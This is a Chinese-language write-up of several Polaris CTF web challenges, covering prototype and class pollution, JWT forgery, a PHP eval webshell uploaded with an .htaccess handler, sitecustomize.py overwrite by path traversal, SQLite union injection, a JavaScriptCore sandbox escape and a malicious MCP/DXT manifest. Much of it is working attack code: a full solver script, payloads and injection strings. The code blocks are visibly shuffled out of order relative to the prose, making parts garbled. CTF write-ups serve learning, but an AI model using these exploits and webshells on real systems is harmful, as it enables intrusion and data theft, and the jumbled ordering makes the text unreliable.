Polaris CTF部分web题wp

0基础也能看懂的，polarisctf部分web题wp
ez_python

题目

1. from flask import Flask, request
2. import json
4. app = Flask(__name__)
6. def merge(src, dst):
7.     for k, v in src.items():
8.         if hasattr(dst, '__getitem__'):
9.             if dst.get(k) and type(v) == dict:
10.                 merge(v, dst.get(k))
11.             else:
12.                 dst[k] = v
13.         elif hasattr(dst, k) and type(v) == dict:
14.             merge(v, getattr(dst, k))
15.         else:
16.             setattr(dst, k, v)
18. class Config:
19.     def __init__(self):
20.         self.filename = "app.py"
22. class Polaris:
23.     def __init__(self):
24.         self.config = Config()
26. instance = Polaris()
28. @app.route('/', methods=['GET', 'POST'])
29. def index():
30.     if request.data:
31.         merge(json.loads(request.data), instance)
32.     return "Welcome to Polaris CTF"
34. @app.route('/read')
35. def read():
36.     return open(instance.config.filename).read()
38. @app.route('/src')
39. def src():
40.     return open(__file__).read()
42. if __name__ == '__main__':
43.     app.run(host='0.0.0.0', port=5000, debug=False)

复制代码

解

1. @app.route('/read')
2. def read():
3.     return open(instance.config.filename).read()

复制代码

目标是污染instance.config.filename为flag

1. {"config": {"filename": "/flag"}}

复制代码

only real

题目

解

源代码泄露账号密码

1. [/code]登录时抓包发现有token并且登录后无法操作，猜测伪造token
2. [code]eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIiwicm9sZSI6InVzZXIiLCJleHAiOjE3NzQ5NDU5MjJ9.oklvvL_iH2xPICwCpsImEtoYgHdXe8y6GXNsbnsB-T4

复制代码

爆破出key=cdef
改token的role=xmuser，发现还是无法操作
修改role=admin，发现可以操作了（其实直接改前端代码把disabled删掉也可以）

1. eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3NzQ5NDU5MjIsInJvbGUiOiJhZG1pbiIsInN1YiI6IjEifQ.w6j2pDZ0eThtl-bUz0HBzRSxcKRT06J-kYAx6Ysu6Pw

复制代码

随便传个1.php果然有限制，试试1.jpg图片马

1. #define width 1337
2. #define height 1337
3. <?php eval($_POST['cmd']); ?>

复制代码

1. [/code]均提示文件内容包含非法关键字
2. [size=4]法一：chr绕过[/size]
4. 尝试绕过关键字限制
5. [code]

复制代码

提示上传成功，这里虽然没有回显保存的路径，但是可以猜测是/upload/文件名/jpg
下面是ai写的一把梭脚本

1. AddType application/x-httpd-php .jpg

复制代码

法三：关键词绕过

1. [/code]抓包改后缀然后访问即可
2. [size=6]ezpollute[/size]
4. [size=5]前置知识[/size]
6. [b]NODE_OPTIONS 环境变量[/b]
7. NODE_OPTIONS 是Node.js的环境变量，用于在启动Node.js时自动添加命令行参数。
8. [code]import requests
9. import jwt
10. import re
11. import sys
13. sys.stdout.reconfigure(encoding='utf-8')
15. target_url = "这里填写靶机地址"
17. session = requests.Session()
19. print("=" * 60)
20. print("CTF Challenge Solver - JWT伪造 + 文件上传绕过")
21. print("=" * 60)
23. print("\n[步骤1] 登录获取token...")
24. resp = session.post(f"{target_url}/login.php", data={"user": "xmuser", "pass": "123456"})
25. token = session.cookies.get("token")
26. print(f"[+] Token获取成功")
28. print("\n[步骤2] 解码并伪造admin token...")
29. payload = jwt.decode(token, options={"verify_signature": False})
30. print(f"[*] 原始payload: {payload}")
31. payload["role"] = "admin"
32. forged_token = jwt.encode(payload, "cdef", algorithm="HS256")
33. if isinstance(forged_token, bytes):
34.     forged_token = forged_token.decode()
35. session.cookies.set("token", forged_token)
36. print(f"[+] Admin token伪造成功")
38. print("\n[步骤3] 上传.htaccess配置文件...")
39. upload_url = f"{target_url}/upload.php"
40. htaccess_content = "AddType application/x-httpd-php .jpg"
41. files = {"file": (".htaccess", htaccess_content, "text/plain")}
42. resp = session.post(upload_url, files=files)
43. print(f"[*] 响应: {resp.text}")
45. print("\n[步骤4] 上传图片马...")
46. image_data = b"GIF89a<?php @eval($_POST['cmd']);?>"
47. files = {"file": ("cmd.jpg", image_data, "image/jpeg")}
48. resp = session.post(upload_url, files=files)
49. print(f"[*] 响应: {resp.text}")
51. print("\n[步骤5] 执行命令获取flag...")
52. shell_url = f"{target_url}/uploads/cmd.jpg"
53. print(f"[*] Shell URL: {shell_url}")
55. commands = [
56.     "system('cat /flag');",
57.     "system('cat /flag.txt');",
58.     "system('ls -la /');",
59.     "system('find / -name flag* 2>/dev/null');",
60.     "echo file_get_contents('/flag');",
61.     "print_r(glob('/*'));",
62.     "system('cat /var/www/html/flag*');",
63. ]
65. for cmd in commands:
66.     try:
67.         resp = session.post(shell_url, data={"cmd": cmd})
68.         result = resp.text
69.         print(f"\n[*] 执行: {cmd}")
70.         print(f"[*] 结果: {result}")
71.         
72.         flag_match = re.search(r'flag\{[^}]+\}', result, re.IGNORECASE)
73.         if flag_match:
74.             print(f"\n{'='*60}")
75.             print(f"[+] 成功获取FLAG: {flag_match.group(0)}")
76.             print(f"{'='*60}")
77.             with open("flag.txt", "w") as f:
78.                 f.write(flag_match.group(0))
79.             break
80.     except Exception as e:
81.         print(f"[-] 执行失败: {e}")
83. print("\n[步骤6] 尝试其他方式...")
84. shell_url = f"{target_url}/uploads/cmd.jpg"
86. print("[*] 尝试直接GET请求执行...")
87. resp = session.get(f"{shell_url}?cmd=system('cat /flag');")
88. print(f"[*] GET结果: {resp.text}")
90. print("\n[*] 尝试phpinfo...")
91. resp = session.post(shell_url, data={"cmd": "phpinfo();"})
92. if "PHP Version" in resp.text:
93.     print("[+] PHP代码执行成功！")
94.     print(f"[*] 响应长度: {len(resp.text)}")

复制代码

-r 参数的作用：在Node.js启动时预加载指定模块。

1. <?= readfile(glob("/fl*")[0]); ?>

复制代码

-r = --require意思是：启动 Node 时，先加载并执行这个文件里的 JS 代码，开发环境常用于设置环境变量。
并且报错时会把出错的那一行打印出来
题目

1. # 设置NODE_OPTIONS
2. export NODE_OPTIONS="-r /path/to/script.js"
4. # 当运行node命令时，相当于
5. node -r /path/to/script.js your_script.js

复制代码

解

审计代码，应该是一道node.js的原型链污染题目
看污染部分逻辑

1. node -r 文件名.js

复制代码

只过滤了__proto__关键词，但我们还是可以使用{"constructor": {"prototype": {"key": "value"}}} 污染
再看到/api/status路由

1. const express = require('express');
2. const { spawn } = require('child_process');
3. const path = require('path');
5. const app = express();
6. app.use(express.json());
7. app.use(express.static(__dirname));
9. function merge(target, source, res) {
10.     for (let key in source) {
11.         if (key === '__proto__') {
12.             if (res) {
13.                 res.send('get out!');
14.                 return;
15.             }
16.             continue;
17.         }
18.         
19.         if (source[key] instanceof Object && key in target) {
20.             merge(target[key], source[key], res);
21.         } else {
22.             target[key] = source[key];
23.         }
24.     }
25. }
27. let config = {
28.     name: "CTF-Guest",
29.     theme: "default"
30. };
32. app.post('/api/config', (req, res) => {
33.     let userConfig = req.body;
35.     const forbidden = ['shell', 'env', 'exports', 'main', 'module', 'request', 'init', 'handle','environ','argv0','cmdline'];
36.     const bodyStr = JSON.stringify(userConfig).toLowerCase();
37.     for (let word of forbidden) {
38.         if (bodyStr.includes(`"${word}"`)) {
39.             return res.status(403).json({ error: `Forbidden keyword detected: ${word}` });
40.         }
41.     }
43.     try {
44.         merge(config, userConfig, res);
45.         res.json({ status: "success", msg: "Configuration updated successfully." });
46.     } catch (e) {
47.         res.status(500).json({ status: "error", message: "Internal Server Error" });
48.     }
49. });
51. app.get('/api/status', (req, res) => {
53.     const customEnv = Object.create(null);
54.     for (let key in process.env) {
55.         if (key === 'NODE_OPTIONS') {
56.             const value = process.env[key] || "";
58.             const dangerousPattern = /(?:^|\s)--(require|import|loader|openssl|icu|inspect)\b/i;
60.             if (!dangerousPattern.test(value)) {
61.                 customEnv[key] = value;
62.             }
63.             continue;
64.         }
65.         customEnv[key] = process.env[key];
66.     }
67.    
68.     const proc = spawn('node', ['-e', 'console.log("System Check: Node.js is running.")'], {
69.         env: customEnv,
70.         shell: false
71.     });
72.    
73.     let output = '';
74.     proc.stdout.on('data', (data) => { output += data; });
75.     proc.stderr.on('data', (data) => { output += data; });
76.    
77.     proc.on('close', (code) => {
78.         res.json({
79.             status: "checked",
80.             info: output.trim() || "No output from system check."
81.         });
82.     });
83. });
85. app.get('/', (req, res) => {
86.     res.sendFile(path.join(__dirname, 'index.html'));
87. });
89. // Flag 位于 /flag
90. app.listen(3000, '0.0.0.0', () => {
91.     console.log('Server running on port 3000');
92. });

复制代码

创建了一个没有原型的对象，但是由于在后面

1. function merge(target, source, res) {
2.     for (let key in source) {
3.         if (key === '__proto__') {
4.             if (res) {
5.                 res.send('get out!');
6.                 return;
7.             }
8.             continue;
9.         }
10.         
11.         if (source[key] instanceof Object && key in target) {
12.             merge(target[key], source[key], res);
13.         } else {
14.             target[key] = source[key];
15.         }
16.     }
17. }

复制代码

讲process.env的参数赋给customEnv
所以我们仍然可以污染process.env的原型来间接污染customEnv
发送污染Payload

1. const customEnv = Object.create(null);

复制代码

再访问 /api/status ，此时：

• 创建子进程 node -e 'console.log(...)'
  
• 子进程继承被污染的 process.env.NODE_OPTIONS
  
• 实际执行：node -r /flag -e 'console.log(...)'
  
• Node.js 尝试预加载 /flag 文件
  
• /flag 内容 XMCTF{...} 不是合法JS，报错
  
• 错误信息中包含 flag 内容
  

ai一把梭脚本

1. for (let key in process.env) {
2.         if (key === 'NODE_OPTIONS') {
3.             const value = process.env[key] || "";
5.             const dangerousPattern = /(?:^|\s)--(require|import|loader|openssl|icu|inspect)\b/i;
7.             if (!dangerousPattern.test(value)) {
8.                 customEnv[key] = value;
9.             }
10.             continue;
11.         }
12.         customEnv[key] = process.env[key];
13.     }

复制代码

Not a Node

前置知识

使用Error.prepareStackTrace技巧

这是一个V8/JSC引擎的特性，用于自定义错误堆栈的显示方式。

1. POST /api/config HTTP/1.1
2. Content-Type: application/json
4. {
5.     "constructor": {
6.         "prototype": {
7.             "NODE_OPTIONS": "-r /flag"
8.         }
9.     }
10. }

复制代码

原理：当JavaScript引擎准备显示错误堆栈时，会调用Error.prepareStackTrace函数。通过修改这个函数，我们可以在错误发生时执行自定义代码。
获取全局对象

使用(0, eval)("this")技巧：

1. import requests
2. import re
4. target_url = "http://target_url"
6. session = requests.Session()
8. # Step 1: 发送污染payload
9. payload = {
10.     "constructor": {
11.         "prototype": {
12.             "NODE_OPTIONS": "-r /flag"
13.         }
14.     }
15. }
17. resp = session.post(
18.     f"{target_url}/api/config",
19.     json=payload,
20.     headers={"Content-Type": "application/json"}
21. )
22. print(f"[+] 污染结果: {resp.text}")
24. # Step 2: 触发漏洞
25. resp = session.get(f"{target_url}/api/status")
26. print(f"[+] 触发结果: {resp.text}")
28. # Step 3: 提取flag
29. flag_match = re.search(r'(XMCTF|flag)\{[^}]+\}', resp.text, re.IGNORECASE)
30. if flag_match:
31.     print(f"[+] FLAG: {flag_match.group(0)}")

复制代码

为什么这样写？

• (0, eval)是JavaScript的一个技巧，确保eval在全局作用域执行
  

格式？

1. // 定义自定义的堆栈格式化函数
2. Error.prepareStackTrace = function(error, stack) {
3.     // error: 错误对象
4.     // stack: CallSite对象数组，包含调用栈信息
5.     return "custom stack";
6. };
8. // 触发一个错误来测试
9. try {
10.     throw new Error("test");
11. } catch (e) {
12.     console.log(e.stack);
13. }

复制代码

关于JSC

JSC = JavaScriptCore
是 Safari / 边缘计算用的浏览器引擎，无 Node.js 原生 API
关于Uint8Array

Uint8Array是JavaScript中的类型化数组，用于表示8位无符号整数数组。它可以用来处理二进制数据。

1. // (0, eval) 将eval作为普通函数调用，而不是直接调用
2. // "this" 在eval中指向全局对象
3. let global = (0, eval)("this");
4. console.log(global);

复制代码

而二进制数据，一般直接作为原始字节传递，不被当作字符串处理
题目

我们搭建了一个“安全”的在线 JavaScript 运行平台。
你提交的代码会被放进一个精心准备的沙箱中运行，一切看起来很干净

解

拿到题不会做也没啥想法，跟着ai走一遍学习学习
第一步：信息收集

网站右侧

1. (0, eval)
2. (1, eval)
3. (null, eval)
4. ('', eval)
5. [eval][0]
6. window.eval                #浏览器中
7. global.eval                #node.js中

复制代码

说明无法使用node.js原生api

1. // 创建一个Uint8Array
2. let arr = new Uint8Array([72, 101, 108, 108, 111]);  // "Hello"
4. // 将字符串转为Uint8Array
5. let encoder = new TextEncoder();
6. let bytes = encoder.encode("Hello");  // Uint8Array [72, 101, 108, 108, 111]
8. // 将Uint8Array转回字符串
9. let decoder = new TextDecoder();
10. let str = decoder.decode(bytes);  // "Hello"

复制代码

泄露使用了__runtime 的几个函数

1. Fetch API standards fully supported in the JSC sandboxed context.
2. #Fetch API 标准在 JSC 沙箱环境中被完全支持。

复制代码

提示可能利用__runtime 的其他函数？
第二步：进一步信息收集找可利用方法

探测runtime中的可用属性，注意由于返回内容包含对象，要使用JSON.stringify处理返回内容，并且需要Object.getOwnPropertyNames获取所有属性（否则函数，下划线开头等属性不会显示）

1. __runtime.hash(str)
2. High-performance DJB2 hashing.
4. __runtime.encoding.hexEncode(s)
5. e.g. hexEncode("internal") -> 696e7465...

复制代码

可以发现runtime中"_debug" "_secrets" "_internal"这三个比较可疑
分别列出其中可用函数

1. Advanced
2. The runtime exposes documented APIs through the __runtime global. Platform orchestration may rely on additional internal bindings not listed here.
3. #高级
4. #运行时通过 __runtime 全局对象暴露已公开的 API。
5. #平台调度可能依赖此处未列出的其他内部绑定（方法）。

复制代码

1. export default {
2.     async fetch(req) {
3.         let runtime = (0, eval)("this").__runtime;
5.         // 列出所有自身属性（包括 _internal / _secrets / _debug）
6.         let allKeys = Object.getOwnPropertyNames(runtime);
8.         return new Response(JSON.stringify(allKeys));
9.     }
10. };
12. //回显
13. //["hash","strlen","platform","perf","encoding","_debug","_secrets","_internal"]

复制代码

没啥发现，挨个看看
在看到_internal.lib.symbols时

1. export default {
2.     async fetch(req) {
3.         let s = __runtime._secrets;
5.         // 看 _secrets 下有哪些函数/属性
6.         let keys = Object.getOwnPropertyNames(s);
8.         return new Response(JSON.stringify(keys));
9.     }
10. };

复制代码

0x开头推测是16进制，解码一下分别是read和list
尝试直接调用read函数读/flag

1. _debug : ["enabled","trace","dump","inspect"]
2. _secrets : ["get","list"]
3. _internal : ["debug","lib"]

复制代码

错误信息告诉我们几个重要信息：

• 路径被修改了：我们传入的是"/flag"，但系统收到的是"/app/\u0000\u0000..."
  
• 支持Uint8Array：错误说参数可以是string、Uint8Array或URL
  
• null bytes问题：路径中出现了\u0000（空字符）
  

推测：

• 系统在处理字符串路径时，会在前面加上/app/
  
• 可能因为某些内存对齐问题，后面跟着空字节
  
• 但如果使用Uint8Array，可能绕过这个处理
  

1. export default {
2.     async fetch(req) {
3.         let s = __runtime._internal.lib.symbols;
4.         let keys = Object.getOwnPropertyNames(s);
5.         return new Response(JSON.stringify(keys));
6.     }
7. };
8. //回显
9. //["_0x72656164","_0x6c697374"]

复制代码

拿到flag
AutoPypy

前置知识

site模块

site模块在Python启动时自动导入，负责：

• 添加site-packages到sys.path
  
• 当 Python 启动时，site 模块会按这个顺序自动执行：
  
  
  • 导入 sitecustomize.py
    
  • 导入 usercustomize.py
    
  • 处理 .pth 文件
    
  
  

sitecustomize.py(系统级)
这是Python的特殊文件，在解释器启动时自动导入：

1. export default {
2.   async fetch(request) {
3.     let flag = __runtime._internal.lib.symbols._0x72656164('/flag');
4.     return new Response(JSON.stringify(flag));   
5.   }
6. }
8. //回显
9. //"ERROR: The argument 'path' must be a string, Uint8Array, or URL without null bytes. Received "/app/\\u0000\\u0000\\u0000\\u0000\\u0000""

复制代码

usercustomize.py(用户级)
与前者类似，同样自动执行
os.path.join的特性

os.path.join在Unix上如果第二部分是绝对路径，会返回第二部分！

1. export default {
2.   async fetch(request) {
3.           let encoder = new TextEncoder();
4.         let path = encoder.encode("/flag");
5.     let flag = __runtime._internal.lib.symbols._0x72656164(path);
6.     return new Response(JSON.stringify(flag));   
7.   }
8. }
10. //回显
11. //xmctf{......}

复制代码

也可以

1. # sitecustomize.py
2. import os
3. os.system('cat /flag')  # 每次Python启动都执行，我们可以插入恶意代码，每次运行时都会自动执行

复制代码

题目

server.py

1. os.path.join('/app/uploads', '/etc/passwd')  # /etc/passwd

复制代码

launcher.py

1. path = os.path.join('/app/uploads', '../../../etc/passwd')

复制代码

解

简单代码审计

1. import os
2. import sys
3. import subprocess
4. from flask import Flask, request, render_template, jsonify
6. app = Flask(__name__)
8. BASE_DIR = os.path.dirname(os.path.abspath(__file__))
9. UPLOAD_FOLDER = os.path.join(BASE_DIR, 'uploads')
11. if not os.path.exists(UPLOAD_FOLDER):
12.     os.makedirs(UPLOAD_FOLDER)
15. @app.route('/')
16. def index():
17.     return render_template("index.html")
19. @app.route('/upload', methods=['POST'])
20. def upload():
21.     if 'file' not in request.files:
22.         return 'No file part', 400
23.    
24.     file = request.files['file']
25.     filename = request.form.get('filename') or file.filename
26.    
27.     save_path = os.path.join(UPLOAD_FOLDER, filename)
28.    
29.     save_dir = os.path.dirname(save_path)
30.     if not os.path.exists(save_dir):
31.         try:
32.             os.makedirs(save_dir)
33.         except OSError:
34.             pass
36.     try:
37.         file.save(save_path)
38.         return f'成功上传至: {save_path}'
39.     except Exception as e:
40.         return f'上传失败: {str(e)}', 500
42. @app.route('/run', methods=['POST'])
43. def run_code():
44.     data = request.get_json()
45.     filename = data.get('filename')
47.     target_file = os.path.join('/app/uploads', filename)
49.     launcher_path = os.path.join(BASE_DIR, 'launcher.py')
51.     try:
52.         proc = subprocess.run(
53.             [sys.executable, launcher_path, target_file],
54.             capture_output=True,
55.             text=True,
56.             timeout=5,
57.             cwd=BASE_DIR
58.         )
59.         return jsonify({"output": proc.stdout + proc.stderr})
60.     except subprocess.TimeoutExpired:
61.         return jsonify({"output": "Timeout"})
63. if __name__ == '__main__':
64.     import site
65.     print(f"[*] Server started.")
66.     print(f"[*] Upload Folder: {UPLOAD_FOLDER}")
67.     print(f"[*] Target site-packages (Try to reach here): {site.getsitepackages()[0]}")
68.     app.run(host='0.0.0.0', port=5000)

复制代码

• filename可控（通过request.form.get('filename')）
  
• os.path.join可能存在路径穿越
  

考虑覆盖sitecustomize.py
我们可以通过一段命令查看路径

1. import subprocess
2. import sys
4. def run_sandbox(script_name):
5.     print("Launching sandbox...")
6.     cmd = [
7.         'proot',
8.         '-r', './jail_root',
9.         '-b', '/bin',
10.         '-b', '/usr',
11.         '-b', '/lib',
12.         '-b', '/lib64',
13.         '-b', '/etc/alternatives',
14.         '-b', '/dev/null',
15.         '-b', '/dev/zero',
16.         '-b', '/dev/urandom',
17.         '-b', f'{script_name}:/app/run.py',
18.         '-w', '/app',
19.         'python3', 'run.py'
20.     ]
21.     subprocess.call(cmd)
22.     print("ok")
24. if __name__ == "__main__":
25.     script = sys.argv[1]
26.     run_sandbox(script)

复制代码

或者ai说还有一个规则：
Linux 中，Python 的第三方包目录 永远是这个格式：

1. file = request.files['file']
2.     # 从请求参数或文件名获取保存路径
3.     filename = request.form.get('filename') or file.filename
4.    
5.     # 路径穿越漏洞！
6.     save_path = os.path.join(UPLOAD_FOLDER, filename)
7.    
8.     # 创建目录
9.     save_dir = os.path.dirname(save_path)

复制代码

X.Y = 大版本号（只取前两位，3.10.19 → 3.10）
创建恶意sitecustomize.py并上传

1. import site
2. import sys
3. print("site:", site.getsitepackages())#存放第三方库的位置
4. print("sys.path:", sys.path)#加载模块的路径列表
6. #回显
7. #site: ['/usr/local/lib/python3.10/site-packages']
8. #sys.path: ['/app', '/usr/local/lib/python310.zip', '/usr/local/lib/python3.10', '/usr/local/lib/python3.10/lib-dynload', '/usr/local/lib/python3.10/site-packages']

复制代码

1. ------geckoformboundary3c9412bd20120f86ad0e5f9e21ad00bbContent-Disposition: form-data; name="file"; filename="1.py"Content-Type: image/jpegimport site
2. import sys
3. print("site:", site.getsitepackages())#存放第三方库的位置
4. print("sys.path:", sys.path)#加载模块的路径列表
6. #回显
7. #site: ['/usr/local/lib/python3.10/site-packages']
8. #sys.path: ['/app', '/usr/local/lib/python310.zip', '/usr/local/lib/python3.10', '/usr/local/lib/python3.10/lib-dynload', '/usr/local/lib/python3.10/site-packages']------geckoformboundary3c9412bd20120f86ad0e5f9e21ad00bbContent-Disposition: form-data; name="filename"../../../../usr/local/lib/python3.10/site-packages/sitecustomize.py------geckoformboundary3c9412bd20120f86ad0e5f9e21ad00bb--#回显#成功上传至: /app/uploads/../../../../usr/local/lib/python3.10/site-packages/sitecustomize.py

复制代码

然后执行任意文件就拿到flag了
同样的，除了sitecustomize.py我们还可以用usercustomize.py
但是要注意路径不一样

1. import os
2. print(open('/flag').read())

复制代码

其余步骤与前者相同
Broken Trust

题目

某FlaskWeb应用提供了一个仅管理员可访问的备份读取接口。
神通广大的CTFer是否能发现逻辑缺陷，拿到敏感文件呢
解

注册拿uid登录，发现有特定的工具但是Only users with the admin role can access the backup interface.
发现cooki中有

1. ------geckoformboundary3c9412bd20120f86ad0e5f9e21ad00bb
2. Content-Disposition: form-data; name="file"; filename="1.py"
3. Content-Type: image/jpeg
5. import os
6. print(open('/flag').read())
7. ------geckoformboundary3c9412bd20120f86ad0e5f9e21ad00bb
8. Content-Disposition: form-data; name="filename"
10. ../../../../usr/local/lib/python3.10/site-packages/sitecustomize.py
11. ------geckoformboundary3c9412bd20120f86ad0e5f9e21ad00bb--
14. #回显
15. #成功上传至: /app/uploads/../../../../usr/local/lib/python3.10/site-packages/sitecustomize.py

复制代码

尝试爆破

1. import site
2. print(site.getusersitepackages())
4. #回显
5. #/home/ctf/.local/lib/python3.10/site-packages

复制代码

失败
源代码提取不到什么信息
抓包探索一下功能
发现Refresh Session Data功能会把uid POST给/api/profile，而我们知道profile一般和用户配置文件有关，并且返回内容是我们注册时的名称，可能有查询功能，考虑下sql？
尝试在UID参数中添加单引号：

1. session=eyJyb2xlIjoidXNlciIsInVpZCI6Ijk1OTY2YzI0YTI0MzQwMjU5NWQ2MDIxMjkwNTU4YTc5IiwidXNlcm5hbWUiOiJhYWEifQ.ac8pHA.beGJyhdag0KL8k_Z2lJHUS1iJD0

复制代码

提到了database error数据库错误
测试回显：

1. flask-unsign --unsign --cookie "eyJyb2xlIjoidXNlciIsInVpZCI6Ijk1OTY2YzI0YTI0MzQwMjU5NWQ2MDIxMjkwNTU4YTc5IiwidXNlcm5hbWUiOiJhYWEifQ.ac8pHA.beGJyhdag0KL8k_Z2lJHUS1iJD0" --wordlist E:\字典\flask_secrets.txt

复制代码

尝试不同数据库的获取版本的语句

1. {"uid":"95966c24a243402595d6021290558a79'"}
3. 回显
4. {"details":"unrecognized token: "'95966c24a243402595d6021290558a79''"","error":"Database error"}

复制代码

确定是sqlite
爆数据库内容

1. {"uid":"95966c24a243402595d6021290558a79' union select 1,2,3 --"}
3. 回显
4. {"role":3,"uid":1,"username":2}

复制代码

我们的uid是95966...另一个应该就是admin了
拿uid去登录，admin专属工具是一个任意文件读取

1. {"uid":"95966c24a243402595d6021290558a79' union select sqlite_version(),2,3-- -"}
3. 回显
4. {"role":3,"uid":"3.34.1","username":2}

复制代码

我们尝试路径遍历
....读不到flag，猜测有过滤
尝试双重url编码（双写../也可以）

1. {"uid":"95966c24a243402595d6021290558a79' union select 1,2,(select group_concat(uid) from users)--"}
3. 回显
4. {"role":"72adb8bc58dc4028bc694124095b111a,95966c24a243402595d6021290558a79","uid":1,"username":2}

复制代码

拿到flag
DXT

前置知识

什么是DXT文件？

DXT是一种用于打包和分发MCP（Model Context Protocol）服务的文件格式。
DXT文件结构

DXT文件本质上是一个ZIP压缩包，包含：

1. /api/admin?action=backup&file=config.json

复制代码

什么是MCP？

MCP（Model Context Protocol）是一种协议，用于AI模型与外部服务交互。
MCP配置

MCP服务通过command和args指定启动命令：

1. ../../../flag
2. %252e%252e%252f%252e%252e%252f%252e%252e%252f%2566%256c%2561%2567

复制代码

如果command和args可控，可以执行任意命令！
题目

一个简单的mcp_server

解

先试试php一句话木马，要求后缀.dxt
随便上传一个.dxt后缀的文件

1. evil.dxt (ZIP文件)
2. ├── manifest.json    # 配置文件
3. └── dummy.txt        # 占位文件

复制代码

看来需要按照正确格式上传
下面就靠ai教了

1. {
2.     "mcp_config": {
3.         "command": "/bin/sh",
4.         "args": ["-c", "echo hello"]
5.     }
6. }

复制代码

然后把生成的dxt文件上传并允许，在vps上开

1. Upload failed: Failed to unpack DXT file: failed to open dxt file: zip: not a valid zip file

复制代码

即可拿到shell(尝试python和bash弹shell好像都失败了，但是nc成功了)

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

感谢分享，学习下。